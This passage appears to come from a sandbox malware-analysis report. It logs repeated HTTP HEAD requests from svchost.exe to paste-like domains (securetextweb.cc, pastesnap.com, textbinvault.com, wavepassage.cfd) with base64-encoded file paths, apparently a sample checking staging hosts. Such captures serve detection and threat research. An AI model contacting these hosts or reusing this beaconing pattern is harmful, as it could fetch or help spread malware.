                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QGD%2BXrjzHSGaH3Eg82rrbOIJtIRf%2FpAYe83yDwfXFmvIiCfm9sELzLiPZxS8shPhGmqg7lgRpCnoouXipZKHOwz0MC1dj6ipRw1Wgi5tWBIAdvQq83noa7YcYmyqXGsY794%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d23e039e08-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2004&rtt_var=1002&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              56 | 192.168.2.7 | 50110 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:00.675987005 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.126154900 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r79r4g%2BiEGz5CrMCfrc6aSRYDNft4U6DTIrfI8CG3qbUXIOTsm6dswIVFOJ7cwFOk04NGcn7AK90WA1wN79cAfjS6IHzM%2Fk72IftT%2FIMtWPUlwdqK0loMQFAcyianYBzmlsL"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d3b9f3c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1652&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              57 | 192.168.2.7 | 50115 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:00.897468090 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.370486975 CET | 856 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l1tLPlc6NBMAzK3Wfa%2BTiT3xHmgaZ7b54ZmKIVznimknLJOoTewsTJ0dXrFzlYQjgPbTavsbQBxjgZZANs0MI15S6vGe088i86xSK869yfafuCc0V69Ejnc3Q7KSxZyP"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d538afc470-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              58 | 192.168.2.7 | 50122 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:01.377096891 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:01.833303928 CET | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:01 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2718FK5K4CHUQq1BSCdzlI62Z4SY7TOY5ZQE5UCiz2nsbbW2NApMUfGgvWSwC1Nlm8UwqwJecCA4HZZOCUtabAXiNgGN0AfQFc00w8RwSzfdRAoR53RCcRjWglyzupRtqOJm"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d81ae84235-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1724&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              59 | 192.168.2.7 | 50124 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:01.594049931 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.078713894 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BoUSnaJkEj7wJBP0By0QVAuqX%2F8wxXSF%2FH15C%2B67IvHz6L2toWaQljzIydXVwg6%2FVv4Tdck8AIsFE4rJk7fc9TxwqvkEQijlYEeVg6Uz3sOOg6Td9W8RZRYOJtOGMwLTWk%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d9a9d2423f-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2176&rtt_var=1088&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              60 | 192.168.2.7 | 50131 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:01.839325905 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.288213968 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgZSgeth8TQ1EbdynwQzpGfdEnov6Gl213d0YbN94Uy7HP3SQBVzaXOHnnp5E8LS1YukH2q9yMdDlzPgZx84Ax5xobNnOT16ZUd9bTAlBoiomhTa4%2ByEUvUG4HN0Y%2F3k7lBV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3dafc7ec358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              61 | 192.168.2.7 | 50133 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:02.085355043 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:02.536221027 CET | 860 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VslYA1%2FLvVTCPJDkgWYjfDgyoGhjy5gNklnLtwjAx0UEU2kAZFG0Xq%2F0BMLWfFCN6lYQF0yE6WGDTXY0cXsa3%2F53e5D3LkBT7tFGTV0swXWAQNsYqdpbNROIwjZAsqUK"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3dc8f260f95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              62 | 192.168.2.7 | 50143 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:02.543524027 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.022188902 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:02 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:02 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L47AroqyZPTRUxFFWP2uLoqluqjklKQNlLBsXytthjF1h58i6bhcSUmkw7W0JLKo%2F2OJokpCOKrW59jIRM96Cjll0CwlRer0DhT64r0q%2B0AScwX9kYJ73SCCyG%2BxjywpTvpp"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3df8eaff5fa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1507&min_rtt=1507&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              63 | 192.168.2.7 | 50145 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:02.772903919 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.248403072 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2zF0cJqpFLz9%2Fl0cxNavUpsHu5ou4GgbcnFujCA%2B8TyR7BpYA%2BOKD6Bx%2FJjyj17jbcHaOm7b9hEZygktWrzQlGkzgaTOvIKPfQq7WaAgkMa2emaRwFYkUNau3HfQiofQ0k%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e0f8924363-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              64 | 192.168.2.7 | 50147 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:03.028840065 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.481189013 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EANa1jrdokpHJu%2Bd5ajGA1aJjctZL7ZU3L83Ulw2p5LBHRUyQV29ww3rbZjnOwBvpIGfvgH26JgHSWEEohYampXk8wNGIeP%2BrMYMEpS3ehRrw9uPtc%2FFeS0EEpTtBTdXseiR"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e279568ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1935&min_rtt=1935&rtt_var=967&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              65 | 192.168.2.7 | 50154 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:03.254801989 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:03.714948893 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:03 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1i8gYJ9%2BvltQ9VJyn1lP8pvKJI6Tce2IzDx%2BOAmV65jk%2FJ4PQYobAzl5r8V0ujyzxJNJ%2FuLGeIfrJ5JhA9ZVy04p0bQytufnGrFuDcMVQOPsRhjY0zjjhXUuSO1cSYVF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e3d82b5e86-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              66 | 192.168.2.7 | 50159 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:03.721498966 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.195158958 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAjrcAVe4a2CXvhl8ZPl%2FNaD8jnL6Tq0NBWQBdazHg%2FWyW99%2FzKCfbAXlypi9SPW8X5P2TLcVrEuacHuK2xWSo1yc%2FLiLx%2F4%2Bju5dM9DtKTtm3GW1uMQEhA6F%2FRWBU6JEL3l"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e6df494273-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2515&min_rtt=2515&rtt_var=1257&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              67 | 192.168.2.7 | 50165 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:03.970514059 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.430886984 CET | 869 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YstU1iy6TSPkVAuwtbBhWwydddzFgUQpGX9pPGo3wcnYgN1kECTYGgKVLdhjEGUthEY5HEKVvfAho2Iy1VR3qPTPr6wQhV5ieCNkfD4ierGZP103KnolT50z%2F5EyOyNel9U%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3e85a0eefa9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              68 | 192.168.2.7 | 50168 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:04.201380968 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.714772940 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E%2FvSQhXZOKIyjwY3nxh%2Fpf%2FAhwGPv4dkA3bV5P345DdXiNwXngc9yuHGwLmrKWBwvDyhF%2BBLuucgeHK6lSxPLXKa0bha1lYLCAjaG4JYgg628eSo38gGSEh3of0tr9u4Cb9e"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ea2d548ca1-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1930&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              69 | 192.168.2.7 | 50170 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:04.437614918 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:04.922410011 CET | 858 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:04 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwdmlYj7Onrjr8Fj29Whpod0DZQuYeZ9vKEJcCR0W9DkaPrMJjHsk7XZ9O6jh4gK8%2FcK7xynqyeO7VCzMnxHhkr3AOOZXb%2B9EfVJcVNAYXIeR0Fh6qXj7nAtnEW6Qibx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3eb6b0a7cac-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1892&rtt_var=946&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              70 | 192.168.2.7 | 50180 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:04.928903103 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.382282019 CET | 881 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=seVzAypNY%2Fq8KOjCrKp0PN6Sbc0LSQHAFm%2Fzb3%2B%2B%2B3Uv%2BrNdF7U3CbGuz6%2BTgbl1JvSAyu%2FsUSNNhbuQKF4aC2q86wXQm5u0yp4OlW5UpfrzGlRixx00wLDEXnXFs19FOXsT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3ee4e9c18bc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              71 | 192.168.2.7 | 50182 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:05.211678982 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.662674904 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBzmUnF8Gyitt79hYsrLP0tjU3sI5EJymtu35KEWYE9JjMDMRr8mUfFCZgyOtvnPzjvnHM89xLQCk4w9bdePFG7cy55o6FBtw3sCMWpleoRX5tOrLfxKHPhuebv0RNanbBc%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3f01c3ac358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1644&rtt_var=822&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              72 | 192.168.2.7 | 50184 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:05.388803005 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:27:05.838387012 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:05 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ByUtlneduo8tso9THmz%2Boo9w4GzH7V4yeWAHfmCCst7xjtNAWkVj%2B89qqpWnzpguz0ZMK3MluZMWk2v35UjwveqbVRGWyyrpKkaWWzwUywbMpQP5D9y7vo2qj7SW%2B5UbgrBm"}],"group":"cf-nel","max_age":604800}
